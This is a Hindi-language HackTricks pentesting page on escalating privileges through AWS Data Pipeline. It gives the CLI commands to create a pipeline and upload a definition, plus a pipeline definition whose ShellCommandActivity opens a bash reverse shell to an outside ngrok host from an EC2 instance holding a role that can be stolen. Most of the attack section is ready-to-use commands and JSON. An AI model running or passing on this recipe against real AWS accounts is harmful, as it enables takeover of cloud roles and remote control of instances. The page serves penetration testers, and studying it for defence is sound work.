AWS - Datapipeline Privesc

हैकट्रिक्स का समर्थन करें

datapipeline

डेटापाइपलाइन के बारे में अधिक जानकारी के लिए देखें:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datappipeline:ActivatePipeline

इन अनुमतियों वाले उपयोगकर्ता डेटा पाइपलाइन बनाकर उनके निर्धारित भूमिका की अनुमतियों का उपयोग करके विभिन्न आदेशों को क्रियान्वित करने के लिए वर्चस्व को बढ़ा सकते हैं:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

पाइपलाइन निर्माण के बाद, हमलावर इसकी परिभाषा को अपडेट करता है ताकि विशिष्ट क्रियाएँ या संसाधन निर्माण को निर्दिष्ट किया जा सके:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

ध्यान दें कि लाइन 14, 15 और 27 में रोल एक रोल होना चाहिए जो datapipeline.amazonaws.com द्वारा अस्सुम किया जा सकता है और लाइन 28 में रोल को एक ec2.amazonaws.com द्वारा अस्सुम किया जा सकने वाला रोल एक EC2 प्रोफ़ाइल इंस्टेंस के साथ होना चाहिए।

इसके अतिरिक्त, EC2 इंस्टेंस को केवल उस रोल तक पहुंच होगी जिसे EC2 इंस्टेंस द्वारा अस्सुम किया जा सकता है (ताकि आप केवल उसे चुरा सकें)।

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

हमलावर द्वारा तैयार किए गए पाइपलाइन परिभाषण फ़ाइल में निर्देश शामिल हैं जो AWS API के माध्यम से कमांड निष्पादित करने या संसाधन बनाने के लिए हैं, डेटा पाइपलाइन की भूमिका अनुमतियों का उपयोग करके अतिरिक्त विशेषाधिकार प्राप्त करने की संभावना है।

संभावित प्रभाव: निर्दिष्ट ईसी 2 सेवा भूमिका को सीधा उन्नति।

संदर्भ

हैकट्रिक्स का समर्थन करें

Last updated